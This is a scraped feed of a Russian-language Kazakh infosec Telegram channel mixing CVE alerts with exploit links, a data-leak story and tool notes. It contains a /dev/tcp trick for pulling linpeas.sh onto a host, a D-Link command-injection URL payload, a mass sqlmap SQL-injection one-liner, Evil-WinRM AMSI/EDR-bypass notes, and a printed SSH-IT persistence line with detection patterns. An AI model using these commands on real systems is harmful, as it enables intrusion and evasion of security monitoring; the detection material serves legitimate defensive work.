SecuriXy.kz


Гео и язык канала: Казахстан, Русский
Категория: Технологии


Все самое интересное из мира информ. безопасности и IT 👍🏻
Обсуждаем, делимся, умнеем
https://securixy.kz
Обратная связь - @feedback_securixy_bot
Хахатушки - @memekatz
Hack the Box RUS - @HTB_RUS

Связанные каналы  |  Похожие каналы

Гео и язык канала
Казахстан, Русский
Категория
Технологии
Статистика
Фильтр публикаций


Репост из: APT
🛡️ Palo Alto PAN-OS Pre-Auth RCE Chain (CVE-2024-0012 & CVE-2024-9474)

A critical vulnerability chain in Palo Alto PAN-OS, combining an authentication bypass (CVE-2024-0012) and a command injection flaw (CVE-2024-9474) in the management web interface, allows unauthenticated attackers to execute arbitrary code with root privileges.

🛠 Affected Versions:
— PAN-OS 11.2 (up to and including 11.2.4-h1)
— PAN-OS 11.1 (up to and including 11.1.5-h1)
— PAN-OS 11.0 (up to and including 11.0.6-h1)
— PAN-OS 10.2 (up to and including 10.2.12-h2)

🔗 Research:
https://labs.watchtowr.com/pots-and-pans-ssl-vpn-palo-alto-pan-os-cve-2024-0012-cve-2024-9474/

🔗 PoC:
https://github.com/watchtowrlabs/palo-alto-panos-cve-2024-0012

🔗 Exploit:
https://github.com/Chocapikk/CVE-2024-9474

#paloalto #panos #sslvpn #unauth #rce


у CWL скидки от 55-80%

https://cyberwarfare.live/blackfriday/
#blackfriday


Репост из: Memekatz
Когда решил узнать статус исправления уязвимостей


Весь год ждали скачух на сертификацию на черную пятницу, нате

https://github.com/0x90n/InfoSec-Black-Friday?tab=readme-ov-file#online-courses--training

#BlackFriday #Promo


Репост из: RedTeam brazzers
Всем привет!

С каждым днем лица людей на улице все более сердитые и угрюмые, кое-где успел выпасть снег, а некогда теплые осенние вечера сменились тоскливыми снежными сумерками.

В такое время очень не хватает хорошего списка LPE эксплойтов под винду.

К великому сожалению, я не смог обнаружить актуальный поддерживаемый список сплойтов 2023-2024 годов, впрочем, благодаря каналу 1N73LL1G3NC3, который был предательски снесен администрацией Telegram, у меня получалось достаточно оперативно пополнять свой небольшой лист с гитхабовскими POC.

Поэтому я принял решение о создании своего списка с LPE сплойтами под винду. Получилось собрать практически все POCи, которые выходили с 2023 года.

Ознакомиться можно тут:
https://github.com/MzHmO/Exploit-Street


Репост из: APT
🚨 Fortinet FortiManager Unauthenticated RCE (CVE-2024-47575)

The remote code execution vulnerability in FortiManager allows attackers to perform arbitrary operations by exploiting commands via the FGFM protocol, circumventing authentication. Referred to as FortiJump, this vulnerability provides unauthorized access to FortiManager, enabling control over FortiGate devices by taking advantage of insufficient security in command handling and device registration processes.

🛠 Affected Versions:
FortiManager 7.6.0
FortiManager 7.4.0 through 7.4.4
FortiManager 7.2.0 through 7.2.7
FortiManager 7.0.0 through 7.0.12
FortiManager 6.4.0 through 6.4.14
FortiManager 6.2.0 through 6.2.12
FortiManager Cloud 7.4.1 through 7.4.4
FortiManager Cloud 7.2.1 through 7.2.7
FortiManager Cloud 7.0.1 through 7.0.12
FortiManager Cloud 6.4

🔗 Research:
https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-23113-cve-2024-47575/

🔗 Source:
https://github.com/watchtowrlabs/Fortijump-Exploit-CVE-2024-47575

#fortinet #fortimanager #fgfm #unauth #rce


Давно искал тулину по тесту почтовых серверов - #MailSecOps

Установка:

git clone https://github.com/0xhav0c/MailSecOps.git; cd MailSecOps;
pip install -r requirements.txt

Использование:

python3 MailSecOps.py




Репост из: Proxy Bar
Citrix Virtual Apps and Desktops (XEN)
*
Unauthenticated Remote Code execution
*
exploit


🚨 Масштабная утечка данных через уязвимость MOVEit 🚨

Хакер под псевдонимом Nam3L3ss опубликовал данные, полученные через критическую уязвимость в ПО MOVEit, что привело к утечке информации о сотрудниках более 25 крупных компаний, включая Amazon, McDonald’s, HSBC и HP.

Ключевые факты:
Уязвимость: CVE-2023-34362 в MOVEit позволила злоумышленникам обходить аутентификацию и получать доступ к конфиденциальным данным.

Объем утечки: Данные включают имена, адреса электронной почты, номера телефонов и организационные структуры сотрудников.

Пострадавшие компании:
• Amazon — 2 861 111 записей
• HSBC — 280 693 записей
• HP — 104 119 записей
• McDonald’s — 3 295 записей
• И многие другие

Рекомендации:
Эта утечка подчеркивает необходимость своевременного обновления программного обеспечения и усиления мер кибербезопасности.

Источник: InfoStealers


Представьте ситуацию, когда на Linux машину нужно что-то положить но на машине нет привычных стредств типа wget, curl и даже по scp никак.

LoL (living off the land) трюк по загрузке файлов на Linux хост. Будет полезно на всяких экзаменах типа OSCP и тп.


>exec 3/dev/tcp//22

>echo -e "GET /linpeas.sh HTTP/1.1\r\nHost: \r\nConnection: close\r\n\r\n" >&3

>cat linpeas.sh


#linux #lol #upload #tips


Репост из: ESCalator
SSH-IT. Инструкция по обнаружению популярного инструмента 🔭

В процессе расследования множества инцидентов, связанных с компрометацией Linux-узлов, мы иногда обнаруживаем на них различные хакерские инструменты.

Сегодня поговорим об SSH-IT. Хакеры часто используют его для перехвата SSH-сессий и получения вводимых пользователем команд.

Для обнаружения признаков установки инструмента на узлах ищите:

1. Файлы по паттерну: '/prng/((askpass|hook|x|ssh_login)\.sh|depth\.cfg|funcs|ptyspy_bin\.[a-z_0-9]+\-(linux|alpine|osx)|seed|ssh|thc_cli)':

find / -type f | egrep -a '/prng/((askpass|hook|x|ssh_login)\.sh|depth\.cfg|funcs|ptyspy_bin\.[a-z_0-9]+\-(linux|alpine|osx)|seed|ssh|thc_cli)'


🧐 Пример:


/home/john/.config/prng/askpass.sh
/home/john/.config/prng/depth.cfg
/home/john/.config/prng/funcs
/home/john/.config/prng/hook.sh
/home/john/.config/prng/ptyspy_bin.aarch64-linux
/home/john/.config/prng/ptyspy_bin.armv6l-linux
/home/john/.config/prng/ptyspy_bin.i386-alpine
/home/john/.config/prng/ptyspy_bin.mips32-alpine
/home/john/.config/prng/ptyspy_bin.mips64-alpine
/home/john/.config/prng/ptyspy_bin.x86_64-alpine
/home/john/.config/prng/ptyspy_bin.x86_64-osx
/home/john/.config/prng/seed
/home/john/.config/prng/ssh
/home/john/.config/prng/ssh_login.sh
/home/john/.config/prng/thc_cli
/home/john/.config/prng/x.sh


2. Файлы, через которые может осуществляться закрепление в системе и в которых встречаются строки по паттерну: '# DO NOT REMOVE THIS LINE\. SEED PRNGD|source.+2\>/dev/null #PRNGD'

egrep -aor '# DO NOT REMOVE THIS LINE\. SEED PRNGD|source.+2\>/dev/null #PRNGD' /


👀 Пример (файл /home/john/.profile):


"# ~/.profile: executed by the command interpreter for login shells.
# DO NOT REMOVE THIS LINE. SEED PRNGD.
source "$(echo 2f686f6d652f6a6f686e2f2e636f6e6669672f70726e672f736565640a|/usr/bin/xxd -r -ps 2>/dev/null)" 2>/dev/null #PRNGD
# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
# exists.
# see /usr/share/doc/bash/examples/startup-files for examples.
# the files are located in the bash-doc package.

# the default umask is set in /etc/profile; for setting the umask
# for ssh logins, install and configure the libpam-umask package.
#umask 022

# if running bash
if [ -n ""$BASH_VERSION"" ]; then
# include .bashrc if it exists
if [ -f ""$HOME/.bashrc"" ]; then
. ""$HOME/.bashrc""
fi
fi

# set PATH so it includes user's private bin if it exists
if [ -d ""$HOME/bin"" ] ; then
PATH=""$HOME/bin:$PATH""
fi

# set PATH so it includes user's private bin if it exists
if [ -d ""$HOME/.local/bin"" ] ; then
PATH=""$HOME/.local/bin:$PATH""
fi"


📃 Рекомендации по дальнейшим действиям:

1️⃣ Заблокировать адреса управляющих серверов;

2️⃣ Удалить файлы, относящиеся к SSH-IT, а также изменить файлы, через которые SSH-IT закрепился в системе;

3️⃣ Перезагрузить скомпрометированный хост;

4️⃣ Осуществить поиск подозрительных входов по сети и проверку логов веб-сервера (если он есть и торчит наружу).

#tip #detect #hacktool #dfir
@ptescalator


🔥 Критическая уязвимость в D-Link хранилках 🔥

🚨 CVE-2024-10914 — Обнаружена уязвимость в моделях D-Link DNS-320, DNS-320LW, DNS-325 и DNS-340L (версии до 28 октября 2024 года), позволяющая удалённым злоумышленникам выполнять произвольные команды.

🔴 Детали: Уязвимость связана с недостаточной проверкой параметра name в функции cgi_user_add файла /cgi-bin/account_mgr.cgi?cmd=cgi_user_add, что может привести к выполнению произвольных команд на устройстве.

💡 Рекомендации: D-Link не планирует выпускать обновления для этих моделей, так как они достигли конца жизненного цикла. Рекомендуется заменить устройства на поддерживаемые модели или, как временное решение, ограничить доступ к ним из внешних сетей.

🔗 PoC GitHub


/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;;%27


Видео недоступно для предпросмотра
Смотреть в Telegram
Автоматизация для ленивых багхантеров или One-Liner для автоматизации сбора и разбора URL-адресов при тестировании на SQL-инъекции по доменному имени:


waybackurls | grep '='| httpx --silent --status-code| awk '{print $1}'| xargs -I{} sqlmap -u {} -v 3 --random-agent --tamper "between,randomcase,space2comment" --level 5 --risk 3 --batch --threads 5 --crawl 2 --suffix=') and 1=1-- -'

#SQLi #waybackurls #sqlmap




🔥Microsoft Windows Server 2025 начал продавливаться апдейтами для обновления🔥

🚀 Дата выпуска: 4 ноября 2024 года

Ключевые особенности:
• Улучшенная безопасность: Новые функции Active Directory и поддержка SMB over QUIC обеспечивают защиту от современных угроз (SMB -> HTTPS TLS 1.3).
• Гибридные возможности: Интеграция с Azure Arc упрощает управление гибридными и мультиоблачными средами.
• Производительность и масштабируемость: Поддержка GPU-партиционирования и улучшенная работа с NVMe-накопителями повышают эффективность работы.

Сначала хотел сказать, что ничего революционного нас не ждёт, но функция «hot patching» позволяющая значительно сократить количество перезагрузок после обновлений. А также значительное увеличение производительности базы данных AD с переходом на многопоточность, это действительно революционные изменения в мире серверных ОС от Microsoft.

Подробнее: Блог Windows Server


Видео недоступно для предпросмотра
Смотреть в Telegram
🩸 Критическая уязвимость RCE в FortiManager 🩸

🚨 #CVE-2024-47575 — Уязвимость удалённого выполнения кода (RCE) в FortiManager, позволяющая неаутентифицированному злоумышленнику выполнять произвольные команды через специально сформированные запросы (также известна как FortiJump).

🔴 Уязвимые версии:
• FortiManager 7.6.0
• FortiManager 7.4.0 - 7.4.4
• FortiManager 7.2.0 - 7.2.7
• FortiManager 7.0.0 - 7.0.12
• FortiManager 6.4.0 - 6.4.14
• FortiManager 6.2.0 - 6.2.12
• FortiManager Cloud: Версии от 6.4.1 до 7.4.4

💡 Детали: PoC продают за 147$, в гитхабе куча селлеров.

🔗 Подробнее от Fortinet
🔗 Аналитика от Mandiant


🔥 Уязвимость обхода аутентификации в Apache Solr 🔥

🚨 CVE-2024-45216 — В Apache Solr с плагином PKIAuthenticationPlugin (включён по умолчанию при активации аутентификации) обнаружена уязвимость обхода аутентификации. Добавление поддельного окончания к любому URL API Solr позволяет обойти проверку!

🔴 Уязвимые версии:
• Solr 5.3.0 до 8.11.3
• Solr 9.0.0 до 9.6.9

💡 Решение: Обновите Solr до версий 9.7.0 или 8.11.4, чтобы защитить систему. Поторопитесь с установкой патча! 🔒

🔗 Подробнее NVD
🔗 Подробнее Разбор
🔗 Шаблон Nuclei


🚀 Обновление Evil-WinRM до версии 3.7 🚀

Кто использует, но давно не обновлялся - #evil-winrm, один из ключевых инструментов для взаимодействия с PowerShell на Windows, добавила новые возможности и улучшения!

PS gem install evil-winrm - обновляет только до 3.5

🔥Основные изменения с версии 3.5 до 3.7:

🆕 Версия 3.7:

• 🛡️ Исправлена команда меню для предотвращения обнаружения как вредоносного ПО.
• 🔀 Улучшено обход EDR, добавлена рандомизация названий функций и переменных PowerShell.
• 📊 Добавлен индикатор выполнения для обхода AMSI.

🆕 Версия 3.6:
• 🔍 Улучшен парсинг путей и исправлена ошибка при загрузке файлов без расширения.
• 🛠️ Заменена устаревшая функция File.exists на File.exist для совместимости с новыми версиями Ruby.
• 🧑‍💻 Добавлен параметр user-agent (благодарим @gmkbenjamin).
• 🛡️ Обновлен обход AMSI и добавлен обход ETW.
• 🐛 Исправлена функция Donut-Loader.

📥 Как обновить до последней версии (v3.7):

gem uninstall evil-winrm # Удалить старую версию
gem install evil-winrm # Установить последнюю версию
rbenv rehash # Обновить кэш rbenv
evil-winrm --version # Проверить текущую версию (должно показать v3.7)

🔗 Подробнее: evil-winrm на GitHub


Репост из: KazDevOps
🗣Внимание, конкурс!

Разыгрываем 7 ваучеров на бесплатное обучение и сертификацию от The
Linux Foundation. Ваучеры дают 100% скидку до 31.10.2025 — и мы хотим ими поделиться:

🟣 Каталог электронных курсов и сертификации

Их можно применить к любому:

— онлайн-курсу
— сертификационному экзамену
— или пакету (курс + сертификация)

🤝 CKA, CKS, CKAD и другие — в комплекте!

Условия розыгрыша просты: 🔵 Подпишитесь на KazDevOps и нажмите "участвую" под этим постом.

🚩 14 ноября подведем итоги и выберем 7 победителей. Каждый получит по ваучеру. Активировать ваучеры нужно до 31.10.2025. После этого у вас будет 1 год и 2 попытки, чтобы завершить обучение и/или сдать экзамен.

Go-go-go, и успехов!

#kubernetes #cka #ckad #cks #k8s #linuxfoundation #cncf

@DevOpsKaz 😛

Показано 20 последних публикаций.